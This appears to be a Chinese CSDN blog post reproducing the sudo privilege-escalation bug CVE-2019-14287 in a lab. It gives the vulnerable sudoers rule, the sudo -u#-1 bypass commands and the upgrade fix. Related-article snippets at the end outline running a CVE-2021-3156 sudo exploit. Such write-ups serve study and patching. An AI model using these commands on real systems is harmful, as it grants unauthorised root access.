linux 普通用户增加sudo_CVE-2019-14287:利用sudo提权

最新推荐文章于 2023-02-14 10:44:22 发布
最新推荐文章于 2023-02-14 10:44:22 发布
阅读量101 收藏
点赞数
文章标签: linux 普通用户增加sudo
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42620340/article/details/112394666
版权

0x00 简介

sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。这样不仅减少了root用户的登录和管理时间,同样也提高了安全性。sudo不是对shell的一个代替,它是面向每个命令的。

0x01 漏洞概述

该漏洞是一个sudo安全策略绕过问题,可导致恶意用户或程序在目标 Linux 系统上以 root 身份执行任意命令,CVE 编号为CVE-2019-14287。个人觉得该漏洞比较鸡肋,因为需要特殊的配置才能触发,在默认的Linux中并不会存在该安全问题。

0x02 影响版本

Sudo版本 < 1.8.28

0x03 环境搭建

任何linux机器上执行sudo -V得到的版本 < 1.8.28均可

本人使用的环境为sudo 1.8.23

da292c0289c4709c76e17e495c564fd9.png

由于需要特定的配置,所以首先修改配置文件sudoers(文件位置/etc/sudoers)

在 root ALL=(ALL:ALL) ALL 下面添加一行配置:

test    ALL=(ALL,!root) ALL

e751c1b4092a87f47a77f2b1b8d56034.png 
1、其中的test表示用户名
2、第一个ALL表示允许该用户在任意机器或者终端中使用sudo
3、括号里面的(ALL,!root)表示命令可以被除了root以外的任意用户身份去执行
4、最后一个ALL表示被允许执行

添加的这一行的配置的意思就是:test这个用户可以使用sudo命令,以除了root以外的任意身份去执行命令。

0x04 漏洞利用

切换到test用户:$su test

执行 $sudo id 失败

执行 $sudo -u#111 id 成功

5b32f68c9877bff4b54e76f09d8ce589.png

所以我们就可以直接是使用sudo -u#id指定用户 id 去执行命令,由于可以指定id,所以可以使用-u#-1或者-u#4294967295绕过限制,从而以root身份去执行任意代码:

34eb274f68f11f991d4bc14ac4cf8655.png

这是因为 sudo 命令本身就已经以用户 ID 为0 运行,因此当 sudo 试图将用户 ID 修改成 -1时,不会发生任何变化。这就导致 sudo 日志条目将该命令报告为以用户 ID 为 4294967295而非 root (或者用户ID为 0)运行命令。(来自代码卫士)

0x05 修复方式

更新至 Sudo 1.8.28 版本

5283b5fa2f1fcb5c0ed5e9d142f6cde8.png
TimeLine Sec团队公众号
Aowandowski
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux sudo-cve-2021-3156
问题很多的小明
02-20 440
目前影响版本: 1.8.2- 1.8.31p2 1.9.0- 1.9.5 p1 复现 kali sudo --version 查看版本 如果存在漏洞,执行sudoedit -s /则返回如下 下载exp: exp(点击下载) 在tmp解压后编译执行: tar -xvzf CVE-2021-3156_nss_poc_ubuntu.tar.gz cd CVE-2021-3156/ make &&./sudo-hax-me-a-sandwich 0 ...
CVE-2019-14287 sudo(复现)
qq_46527139的博客
12-07 226
SUDO:CVE-2019-14287(复现) 漏洞概述 sudo错误地处理了某些用户id。攻击者可能利用此漏洞以根用户身份执行任意命令。 漏洞危害等级:高危 影响版本 组件 版本 os linux2019.3 web server sudo1.8.27 基础环境 基础知识: sudo的作用: Linux是多用户多任务的操作系统,共享该系统的用户往往不只一个。 出于安全性考虑,有必要通过useradd创建一些非root用户, 只让它们拥有 不完全的限;如有必要,再来限执
Linuxsudo漏洞复现
weixin_44767073的博客
11-13 678
关于sudo Linux是多用户多任务的操作系统, 共享该系统的用户往往不只一个。出于安全性考虑, 有必要通过useradd创建一些非root用户, 只让它们拥有不完全的限; 如有必要再来限执行。 sudo就是来解决这个需求的: 这些非root用户不需要知道root的密码,就可以到root,执行一些root才能执行的命令。执行命sudo -u <用户名> <令>...
Linux sudo升漏洞复现(CVE-2021-3156)
热门推荐
02-02 2万+
2021年01月27日,RedHat官方发布了sudo 缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取root限。据报道这个漏洞已存在十年了,大...
漏洞复现 之 sudo漏洞(CVE-2019-14287)复现
Abc_Kimball的博客
01-31 810
一、简介 sudoLinux系统命令,让普通账号以root身份去执行某些命令,如,安装软件、查看某些配置文件、关机、重启等操作,如果普通账号需要使用sudo需要修改配置文件/etc/sudoers,将sudo使用限赋予该账号 • sudo漏洞是一个安全策略绕过问题,去执行某些敏感的命令,CVE编号是CVE-2019-14287,影响的版本是:<1.8.28 二、漏洞复现过程 靶机:Ubuntu 18 x64系统 1.查看sudo版本,并创建test用户 1 sudo -V 查看sudo版本
sudo-cve-2019-18634:CVE-2019-18634的概念证明
03-21
CVE-2019-18634 感谢Apple Information Security的Joe Vennix查找错误。
sudo_1.9.5-3_ubu1804_amd64.deb
02-02
sudo 1.9.5p2,用于ubuntu18版。修复CVE-2021-3156
CVE-2019-19268:新发现0天!
04-16
CVE-2019-19268 受影响的版本:rConfig 3.9.2。 [描述] 由于配置错误,rConfig v3.9.2中存在多个攻击媒介,这允许本地用户通过sudo执行root命令。 [发现者] dmw0ng-不和谐:dmw0ng#4449 TheCyber​​Geek-不和谐...
sudo_1.9.5-3_ubu2004_amd64.deb
02-02
sudo 1.9.5p2,用于ubuntu 20系统。修补CVE-2021-3156
sudo(CVE-2019-14287)复现及原理分析
风雨来花满楼的博客
06-19 838
介绍 sudo,也就是以超级管理员身份运行(superuser do)的意思。sudoLinux中最常使用的重要实用程序之一,它功能十分强大,几乎安装在每一款基于UNIX或 Linux的操作系统上,也是这些操作系统的核心命令。作为一个系统命令,普通用户可通过它以特殊限来运行程序或命令(通常以root用户身份运行命令),而无需切换使用环境。 管理员可以配置...
【CVE-2021-3156】linux sudo复现及补丁修复
redwand的博客
02-01 3765
今天安全圈都在刷屏【CVE-2021-3156】这个漏洞,由于这是一个缓冲区溢出漏洞,通用性比较强,因此也跟个风实验一下,详细复现及修复过程如下。
CVE-2021-3156 sudo命令漏洞复现
zhabgbuneng的博客
05-25 354
CVE-2021-3156 漏洞复现 0x00漏洞描述 这个漏洞被披露于2021年1月26日。漏洞的载体是我们常用的sudo命令。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root限。研究人员利用该漏洞在多个Linux发行版上成功获得了完整的
linux sudo限_CVE201914287 linux sudo root 限绕过漏洞复现
weixin_39572409的博客
12-04 71
0X1漏洞概述2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root限绕过漏洞的补丁修复。此漏洞编号是CVE-2019-14287,当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字,可以通过指定用户ID -1或4294967295以root用户身份运行命令。具有足够sudo限的用户可以使用它来运行Runas...
【漏洞复现】 Sudo缓存溢出漏洞(CVE-2021-3156)
qq_50854662的博客
02-14 545
【漏洞复现】 Sudo缓存溢出漏洞(CVE-2021-3156)
sudo相关漏洞CVE-2019-18634、CVE-2019-14287
悦分享
08-07 678
实际上,只要用户限足够高,即拥有最高sudo限的用户,并且在Runas规范中定义了ALL关键字的话,他们就可以运行Runas规范中明确禁止使用的那些root命令,而且以这种方式运行的命令其日志项所显示的目标用户为4294967295,而不是root。但是,sudo日志条目中记录下的命令运行用户的ID为“4294967295”,而并非root用户(或用户ID为“0”),除此之外,因为用户ID是通过-u选项指定的,并且不会在密码数据库中存储,所以PAM会话模块也不会运行。上述命令运行之后,将返回“0”。.
sudo漏洞(CVE-2019-14287)
SoulCat
10-16 680
sudo限绕过漏洞,附payload(CVE-2019-14287) 希望你别像风在我这里掀起了万般波澜却又跟云去了远方 漏洞概述: sudolinux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,漏洞主要原因因为将用户 ID 转换为用户名的函数,会将 -1(或无效等效的 4294967295)误认为 0,而这正好是 root 用户的 ID 。 漏洞...
CVE-2019-14287(sudo)
墨痕诉清风的博客
06-22 644
复现CVE-2019-14287漏洞 原理:Sudo的全称是"superuserdo”,它是Linux系统管理指令,允许用户在不需要切换环境的前下,以其它用户限运行应用程序或命令,通常是以root用户身份运行命令,以减少root用户的登录和管理时间,同时高安全性,当在Linux操作系统上执行命令时,只有得到许可或者知道root密码,普通用户才可以使用sudo命令以root身份执行命令. 个人理解:(直白点讲就是,如果你入侵了他人的主机,可以利用该漏洞,进行限升级,不用切换root,因为切换root
升级Linux下的sudo
qq_40907977的博客
02-08 9157
sudo官网爆出目前sudo工具的一个高危漏洞,漏洞编号为:CVE-2019-18634,黑客可通过工具获得Linux的root限(root具有Linux操作系统的最高限)。 sudo官网 : https://www.baidu.com/link?url=uPPtTshELZs5FFJ9ZRoL7_TFdhQ2kUUFFaeRxc5O6ky&wd=&eqid=c8bdbe7c0...
linux sudo漏洞,linux CVE-2019-14287 Sudo漏洞(示例代码)
最新发布
05-19
CVE-2019-14287是一个sudo漏洞,攻击者可以利用此漏洞绕过sudo的限制,以root用户的身份执行命令。这个漏洞影响sudo 1.8.28版本之前的所有版本。下面是一个示例代码: ``` $ sudo -u#-1 id uid=0(root) gid=0...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值